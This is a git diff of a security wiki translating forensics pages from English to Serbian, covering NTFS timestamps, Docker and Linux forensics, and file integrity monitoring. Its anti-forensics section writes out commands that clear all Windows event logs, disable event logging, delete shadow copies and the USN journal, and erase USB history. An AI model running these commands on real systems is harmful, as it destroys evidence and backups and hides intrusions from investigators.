[LogFileParser](https://github.com/jschicht/LogFileParser) mogu se koristiti za analizu ove datoteke i identifikaciju promena. ![](<../../images/image (450).png>) -Again, in the output of the tool it's possible to see that **some changes were performed**. +Ponovo, u izlazu alata moguće je videti da su **neke promene izvršene**. 
-Using the same tool it's possible to identify to **which time the timestamps were modified**: +Korišćenjem istog alata moguće je identifikovati **na koji način su vremenske oznake promenjene**: ![](<../../images/image (451).png>) -- CTIME: File's creation time -- ATIME: File's modification time -- MTIME: File's MFT registry modification -- RTIME: File's access time +- CTIME: Vreme kreiranja datoteke +- ATIME: Vreme izmene datoteke +- MTIME: Izmena MFT registra datoteke +- RTIME: Vreme pristupa datoteci -## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison +## Poređenje `$STANDARD_INFORMATION` i `$FILE_NAME` -Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**. +Još jedan način da se identifikuju sumnjivo izmenjene datoteke bio bi da se uporede vremena na oba atributa tražeći **neusklađenosti**. -## Nanoseconds +## Nanosekunde -**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**. +**NTFS** vremenske oznake imaju **preciznost** od **100 nanosekundi**. Stoga, pronalaženje datoteka sa vremenskim oznakama poput 2010-10-10 10:10:**00.000:0000 je veoma sumnjivo**. -## SetMace - Anti-forensic Tool +## SetMace - Anti-forenzički alat -This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information. +Ovaj alat može izmeniti oba atributa `$STARNDAR_INFORMATION` i `$FILE_NAME`. Međutim, od Windows Vista, potrebno je da živi OS izmeni ove informacije. -# Data Hiding +# Sakrivanje podataka -NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**. +NFTS koristi klaster i minimalnu veličinu informacija. 
To znači da ako datoteka koristi i klaster i po i po, **preostala polovina nikada neće biti korišćena** dok se datoteka ne obriše. Stoga, moguće je **sakriti podatke u ovom slobodnom prostoru**. -There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added: +Postoje alati poput slacker koji omogućavaju sakrivanje podataka u ovom "skrivenom" prostoru. Međutim, analiza `$logfile` i `$usnjrnl` može pokazati da su neki podaci dodati: ![](<../../images/image (452).png>) -Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted. +Stoga, moguće je povratiti slobodan prostor koristeći alate poput FTK Imager. Imajte na umu da ovaj tip alata može sačuvati sadržaj obfuskovan ili čak enkriptovan. # UsbKill -This is a tool that will **turn off the computer if any change in the USB** ports is detected.\ -A way to discover this would be to inspect the running processes and **review each python script running**. +Ovo je alat koji će **isključiti računar ako se otkrije bilo kakva promena na USB** portovima.\ +Jedan od načina da se to otkrije bio bi da se ispita pokrenuti procesi i **pregleda svaki python skript koji se izvršava**. -# Live Linux Distributions +# Live Linux distribucije -These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion. +Ove distribucije se **izvršavaju unutar RAM** memorije. Jedini način da ih otkrijete je **ukoliko je NTFS datotečni sistem montiran sa dozvolama za pisanje**. Ako je montiran samo sa dozvolama za čitanje, neće biti moguće otkriti upad. 
-# Secure Deletion +# Sigurno brisanje [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) -# Windows Configuration +# Windows konfiguracija -It's possible to disable several windows logging methods to make the forensics investigation much harder. +Moguće je onemogućiti nekoliko metoda beleženja u Windows-u kako bi se forenzička istraga učinila mnogo težom. -## Disable Timestamps - UserAssist +## Onemogući vremenske oznake - UserAssist -This is a registry key that maintains dates and hours when each executable was run by the user. +Ovo je ključ registra koji održava datume i sate kada je svaki izvršni program pokrenut od strane korisnika. -Disabling UserAssist requires two steps: +Onemogućavanje UserAssist zahteva dva koraka: -1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled. -2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. +1. Postavite dva ključa registra, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` i `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, oba na nulu kako bismo signalizirali da želimo da onemogućimo UserAssist. +2. Očistite svoje podključeve registra koji izgledaju kao `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. -## Disable Timestamps - Prefetch +## Onemogući vremenske oznake - Prefetch -This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices. 
+Ovo će sačuvati informacije o aplikacijama koje su izvršene sa ciljem poboljšanja performansi Windows sistema. Međutim, ovo može biti korisno i za forenzičke prakse. -- Execute `regedit` -- Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` -- Right-click on both `EnablePrefetcher` and `EnableSuperfetch` -- Select Modify on each of these to change the value from 1 (or 3) to 0 -- Restart +- Izvršite `regedit` +- Izaberite putanju datoteke `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` +- Desni klik na `EnablePrefetcher` i `EnableSuperfetch` +- Izaberite Izmeni na svakom od ovih da promenite vrednost sa 1 (ili 3) na 0 +- Ponovo pokrenite -## Disable Timestamps - Last Access Time +## Onemogući vremenske oznake - Vreme poslednjeg pristupa -Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance. +Kad god se folder otvori sa NTFS volumena na Windows NT serveru, sistem uzima vreme da **ažurira polje vremenske oznake na svakom navedenom folderu**, koje se naziva vreme poslednjeg pristupa. Na NTFS volumenu koji se često koristi, ovo može uticati na performanse. -1. Open the Registry Editor (Regedit.exe). -2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. -3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process. -4. Close the Registry Editor, and reboot the server. +1. Otvorite Registry Editor (Regedit.exe). +2. Pretražite do `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. +3. Potražite `NtfsDisableLastAccessUpdate`. Ako ne postoji, dodajte ovaj DWORD i postavite njegovu vrednost na 1, što će onemogućiti proces. +4. 
Zatvorite Registry Editor i ponovo pokrenite server. -## Delete USB History +## Obriši USB istoriju -All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\ -You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) to be sure you have deleted them (and to delete them). +Sve **USB Device Entries** se čuvaju u Windows Registry pod ključem **USBSTOR** koji sadrži podključeve koji se kreiraju svaki put kada priključite USB uređaj na svoj PC ili laptop. Možete pronaći ovaj ključ ovde `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Brisanjem ovog** obrišete USB istoriju.\ +Takođe možete koristiti alat [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) da biste bili sigurni da ste ih obrisali (i da ih obrišete). -Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. +Još jedna datoteka koja čuva informacije o USB-ima je datoteka `setupapi.dev.log` unutar `C:\Windows\INF`. Ova datoteka takođe treba da bude obrisana. 
-## Disable Shadow Copies +## Onemogući senčne kopije -**List** shadow copies with `vssadmin list shadowstorage`\ -**Delete** them running `vssadmin delete shadow` +**Prikaz** senčnih kopija sa `vssadmin list shadowstorage`\ +**Obrišite** ih pokretanjem `vssadmin delete shadow` -You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) +Takođe ih možete obrisati putem GUI prateći korake predložene na [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) -To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): +Da biste onemogućili senčne kopije [koraci odavde](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -1. Open the Services program by typing "services" into the text search box after clicking the Windows start button. -2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking. -3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK. +1. Otvorite program Services tako što ćete otkucati "services" u tekstualnu pretragu nakon što kliknete na Windows dugme za pokretanje. +2. Na listi pronađite "Volume Shadow Copy", izaberite ga, a zatim pristupite Svojstvima desnim klikom. +3. Izaberite Onemogućeno iz padajućeg menija "Tip pokretanja", a zatim potvrdite promenu klikom na Primeni i U redu. 
-It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` +Takođe je moguće izmeniti konfiguraciju koje datoteke će biti kopirane u senčnu kopiju u registru `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` -## Overwrite deleted files +## Prepiši obrisane datoteke -- You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. -- You can also use tools like [**Eraser**](https://eraser.heidi.ie) +- Možete koristiti **Windows alat**: `cipher /w:C` Ovo će označiti cipher da ukloni sve podatke iz dostupnog neiskorišćenog prostora na disku unutar C diska. +- Takođe možete koristiti alate poput [**Eraser**](https://eraser.heidi.ie) -## Delete Windows event logs +## Obriši Windows događaje -- Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" +- Windows + R --> eventvwr.msc --> Proširite "Windows Logs" --> Desni klik na svaku kategoriju i izaberite "Clear Log" - `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` - `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` -## Disable Windows event logs +## Onemogući Windows događaje - `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -- Inside the services section disable the service "Windows Event Log" -- `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` +- Unutar sekcije servisa onemogućite servis "Windows Event Log" +- `WEvtUtil.exec clear-log` ili `WEvtUtil.exe cl` -## Disable $UsnJrnl +## Onemogući $UsnJrnl - `fsutil usn deletejournal /d c:` -
- -{% embed url="https://websec.nl/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/docker-forensics.md b/src/forensics/basic-forensic-methodology/docker-forensics.md index 629251985..c88362463 100644 --- a/src/forensics/basic-forensic-methodology/docker-forensics.md +++ b/src/forensics/basic-forensic-methodology/docker-forensics.md @@ -2,24 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - -## Container modification - -There are suspicions that some docker container was compromised: +## Izmena kontejnera +Postoje sumnje da je neki docker kontejner kompromitovan: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` - -You can easily **find the modifications done to this container with regards to the image** with: - +Možete lako **pronaći izmene koje su izvršene na ovom kontejneru u vezi sa slikom** pomoću: ```bash docker diff wordpress C /var 
@@ -33,70 +25,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` - -In the previous command **C** means **Changed** and **A,** **Added**.\ -If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with: - +U prethodnoj komandi **C** znači **Promenjeno** a **A** znači **Dodato**.\ +Ako otkrijete da je neki zanimljiv fajl kao što je `/etc/shadow` izmenjen, možete ga preuzeti iz kontejnera da proverite za malicioznu aktivnost sa: ```bash docker cp wordpress:/etc/shadow. ``` - -You can also **compare it with the original one** running a new container and extracting the file from it: - +Možete takođe **uporediti sa originalom** pokretanjem novog kontejnera i ekstrakcijom datoteke iz njega: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` - -If you find that **some suspicious file was added** you can access the container and check it: - +Ako otkrijete da je **neki sumnjiv fajl dodat**, možete pristupiti kontejneru i proveriti ga: ```bash docker exec -it wordpress bash ``` +## Izmene slika -## Images modifications - -When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**: - +Kada dobijete eksportovanu docker sliku (verovatno u `.tar` formatu), možete koristiti [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) da **izvučete sažetak izmena**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` - -Then, you can **decompress** the image and **access the blobs** to search for 
suspicious files you may have found in the changes history: - +Zatim možete **dekompresovati** sliku i **pristupiti blobovima** da biste pretražili sumnjive datoteke koje ste možda pronašli u istoriji promena: ```bash tar -xf image.tar ``` +### Osnovna Analiza -### Basic Analysis - -You can get **basic information** from the image running: - +Možete dobiti **osnovne informacije** iz slike pokretanjem: ```bash docker inspect ``` - -You can also get a summary **history of changes** with: - +Možete takođe dobiti sažetak **istorije promena** sa: ```bash docker history --no-trunc ``` - -You can also generate a **dockerfile from an image** with: - +Možete takođe generisati **dockerfile iz slike** sa: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` - ### Dive -In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility: - +Da biste pronašli dodate/izmenjene datoteke u docker slikama, možete koristiti [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alata: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ 
@@ -105,27 +79,19 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` +Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koji su fajlovi modifikovani/dodati. **Crvena** označava dodato, a **žuta** označava modifikovano. Koristite **tab** za prelazak na drugi prikaz i **space** za skupljanje/otvaranje foldera. -This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders. - -With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\ -You can decompress all the layers from an image from the directory where the image was decompressed executing: - +Sa die nećete moći da pristupite sadržaju različitih faza slike. Da biste to uradili, moraćete da **dekompresujete svaki sloj i pristupite mu**.\ +Možete dekompresovati sve slojeve iz slike iz direktorijuma gde je slika dekompresovana izvršavanjem: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` +## Kredencijali iz memorije -## Credentials from memory +Napomena da kada pokrenete docker kontejner unutar hosta **možete videti procese koji se izvršavaju na kontejneru iz hosta** jednostavno pokretanjem `ps -ef` -Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef` +Stoga (kao root) možete **izvršiti dump memorije procesa** iz hosta i pretražiti za **kredencijalima** baš [**kao u sledećem primeru**](../../linux-hardening/privilege-escalation/#process-memory). 
-Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). - -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 214b917cf..7a32208c2 100644 --- a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md 
@@ -1,25 +1,25 @@ {{#include ../../banners/hacktricks-training.md}} -# Baseline +# Osnovna linija -A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**. +Osnovna linija se sastoji od pravljenja snimka određenih delova sistema kako bi se **uporedila sa budućim statusom radi isticanja promena**. -For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\ -This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. +Na primer, možete izračunati i sačuvati hash svake datoteke u datotečnom sistemu kako biste mogli da saznate koje su datoteke modifikovane.\ +To se takođe može uraditi sa korisničkim nalozima koji su kreirani, procesima koji se izvršavaju, servisima koji se izvršavaju i bilo čim drugim što ne bi trebalo da se mnogo menja, ili uopšte. -## File Integrity Monitoring +## Praćenje integriteta datoteka -File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: +Praćenje integriteta datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka: -1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. -2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. +1. **Uporedna analiza osnovne linije:** Uspostavite osnovnu liniju koristeći atribute datoteka ili kriptografske heš vrednosti (kao što su MD5 ili SHA-2) za buduće uporedbe radi otkrivanja modifikacija. +2. 
**Obaveštavanje o promenama u realnom vremenu:** Dobijajte trenutna obaveštenja kada se datoteke pristupaju ili menjaju, obično putem ekstenzija jezgra OS-a. -## Tools +## Alati - [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) - [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -## References +## Reference - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) diff --git a/src/forensics/basic-forensic-methodology/linux-forensics.md b/src/forensics/basic-forensic-methodology/linux-forensics.md index 8d505942f..fb3d366d8 100644 --- a/src/forensics/basic-forensic-methodology/linux-forensics.md +++ b/src/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,28 +1,17 @@ # Linux Forensics -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} -## Initial Information Gathering +## Početno prikupljanje informacija -### Basic Information - -First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries: +### Osnovne informacije +Prvo, preporučuje se da imate neki **USB** sa **dobro poznatim binarnim datotekama i bibliotekama** (možete jednostavno preuzeti ubuntu i kopirati foldere _/bin_, _/sbin_, _/lib,_ i _/lib64_), zatim montirajte USB i modifikujte env varijable da koristite te binarne datoteke: ```bash export PATH=/mnt/usb/bin:/mnt/usb/sbin export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 ``` - -Once you have configured the system to use good and known binaries you can start **extracting some basic information**: - +Kada konfigurišete sistem da koristi dobre i poznate binarne datoteke, možete početi sa **ekstrakcijom osnovnih informacija**: ```bash date #Date and time (Clock may be skewed, Might be at a different timezone) uname -a #OS info 
@@ -40,50 +29,46 @@ cat /etc/passwd #Unexpected data? cat /etc/shadow #Unexpected data? find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory ``` +#### Sumnjive informacije -#### Suspicious information +Dok prikupljate osnovne informacije, trebali biste proveriti čudne stvari kao što su: -While obtaining the basic information you should check for weird things like: +- **Root procesi** obično se pokreću sa niskim PIDS, pa ako pronađete root proces sa velikim PID-om, možete posumnjati +- Proverite **registrovane prijave** korisnika bez shel-a unutar `/etc/passwd` +- Proverite **hash-eve lozinke** unutar `/etc/shadow` za korisnike bez shel-a -- **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect -- Check **registered logins** of users without a shell inside `/etc/passwd` -- Check for **password hashes** inside `/etc/shadow` for users without a shell +### Dump memorije -### Memory Dump - -To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ -To **compile** it, you need to use the **same kernel** that the victim machine is using. +Da biste dobili memoriju pokrenutog sistema, preporučuje se korišćenje [**LiME**](https://github.com/504ensicsLabs/LiME).\ +Da biste ga **kompajlirali**, morate koristiti **isti kernel** koji koristi žrtvinska mašina. > [!NOTE] -> Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it - -So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\ -In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. 
To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them: +> Zapamtite da **ne možete instalirati LiME ili bilo šta drugo** na žrtvinskoj mašini jer će to napraviti nekoliko promena na njoj +Dakle, ako imate identičnu verziju Ubuntua, možete koristiti `apt-get install lime-forensics-dkms`\ +U drugim slučajevima, potrebno je preuzeti [**LiME**](https://github.com/504ensicsLabs/LiME) sa github-a i kompajlirati ga sa ispravnim kernel header-ima. Da biste **dobili tačne kernel header-e** žrtvinske mašine, možete jednostavno **kopirati direktorijum** `/lib/modules/` na vašu mašinu, a zatim **kompajlirati** LiME koristeći ih: ```bash make -C /lib/modules//build M=$PWD sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" ``` +LiME podržava 3 **formata**: -LiME supports 3 **formats**: +- Raw (svaki segment spojен zajedno) +- Padded (isto kao raw, ali sa nulama u desnim bitovima) +- Lime (preporučeni format sa metapodacima) -- Raw (every segment concatenated together) -- Padded (same as raw, but with zeroes in right bits) -- Lime (recommended format with metadata - -LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` +LiME se takođe može koristiti za **slanje dump-a putem mreže** umesto da se čuva na sistemu koristeći nešto poput: `path=tcp:4444` ### Disk Imaging -#### Shutting down +#### Isključivanje -First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\ -There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. 
The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. +Prvo, potrebno je da **isključite sistem**. Ovo nije uvek opcija jer ponekad sistem može biti produkcijski server koji kompanija ne može priuštiti da isključi.\ +Postoje **2 načina** za isključivanje sistema, **normalno isključivanje** i **"isključi kabl" isključivanje**. Prvi će omogućiti da se **procesi završe kao obično** i da se **fajl sistem** **sinhronizuje**, ali će takođe omogućiti mogućem **malware-u** da **uništi dokaze**. Pristup "isključi kabl" može doneti **neke gubitke informacija** (neće se mnogo informacija izgubiti jer smo već uzeli sliku memorije) i **malware neće imati priliku** da uradi bilo šta povodom toga. Stoga, ako **sumnjate** da može biti **malware**, jednostavno izvršite **`sync`** **komandu** na sistemu i isključite kabl. -#### Taking an image of the disk - -It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information. +#### Uzimanje slike diska +Važno je napomenuti da **pre nego što povežete svoj računar sa bilo čim vezanim za slučaj**, morate biti sigurni da će biti **montiran kao samo za čitanje** kako biste izbegli modifikaciju bilo kojih informacija. ```bash #Create a raw copy of the disk dd if= of= bs=512 
@@ -92,11 +77,9 @@ dd if= of= bs=512 dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` - ### Disk Image pre-analysis -Imaging a disk image with no more data. - +Imaging disk slike bez dodatnih podataka. ```bash #Find out if it's a disk image using "file" command file disk.img @@ -108,12 +91,12 @@ raw #You can list supported types with img_stat -i list Supported image format types: - raw (Single or split raw file (dd)) - aff (Advanced Forensic Format) - afd (AFF Multiple File) - afm (AFF with external metadata) - afflib (All AFFLIB image formats (including beta ones)) - ewf (Expert Witness Format (EnCase)) +raw (Single or split raw file (dd)) +aff (Advanced Forensic Format) +afd (AFF Multiple File) +afm (AFF with external metadata) +afflib (All AFFLIB image formats (including beta ones)) +ewf (Expert Witness Format (EnCase)) #Data of the image fsstat -i raw -f ext4 disk.img @@ -149,41 +132,31 @@ r/r 16: secret.txt icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` +## Pretraga poznatog Malware-a -
+### Izmenjeni sistemski fajlovi -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Linux nudi alate za osiguranje integriteta sistemskih komponenti, što je ključno za uočavanje potencijalno problematičnih fajlova. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +- **RedHat-bazirani sistemi**: Koristite `rpm -Va` za sveobuhvatnu proveru. +- **Debian-bazirani sistemi**: `dpkg --verify` za inicijalnu verifikaciju, a zatim `debsums | grep -v "OK$"` (nakon instalacije `debsums` sa `apt-get install debsums`) za identifikaciju bilo kakvih problema. -## Search for known Malware +### Malware/Rootkit detektori -### Modified System Files - -Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files. - -- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check. -- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues. - -### Malware/Rootkit Detectors - -Read the following page to learn about tools that can be useful to find malware: +Pročitajte sledeću stranicu da biste saznali o alatima koji mogu biti korisni za pronalaženje malware-a: {{#ref}} malware-analysis.md {{#endref}} -## Search installed programs +## Pretraga instaliranih programa -To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories. +Da biste efikasno pretražili instalirane programe na Debian i RedHat sistemima, razmotrite korišćenje sistemskih logova i baza podataka zajedno sa ručnim proverama u uobičajenim direktorijumima. 
-- For Debian, inspect _**`/var/lib/dpkg/status`**_ and _**`/var/log/dpkg.log`**_ to fetch details about package installations, using `grep` to filter for specific information. -- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages. - -To uncover software installed manually or outside of these package managers, explore directories like _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, and _**`/sbin`**_. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs. +- Za Debian, proverite _**`/var/lib/dpkg/status`**_ i _**`/var/log/dpkg.log`**_ da biste dobili detalje o instalacijama paketa, koristeći `grep` za filtriranje specifičnih informacija. +- RedHat korisnici mogu upititi RPM bazu podataka sa `rpm -qa --root=/mntpath/var/lib/rpm` da bi prikazali instalirane pakete. +Da biste otkrili softver instaliran ručno ili van ovih menadžera paketa, istražite direktorijume kao što su _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, i _**`/sbin`**_. Kombinujte liste direktorijuma sa sistemskim komandama kako biste identifikovali izvršne fajlove koji nisu povezani sa poznatim paketima, čime poboljšavate pretragu za svim instaliranim programima. ```bash # Debian package and log details cat /var/lib/dpkg/status | grep -E "Package:|Status:" @@ -199,29 +172,17 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" # Find exacuable files find / -type f -executable | grep ``` +## Oporavak Izbrisanih Pokrenutih Binarnih Fajlova -
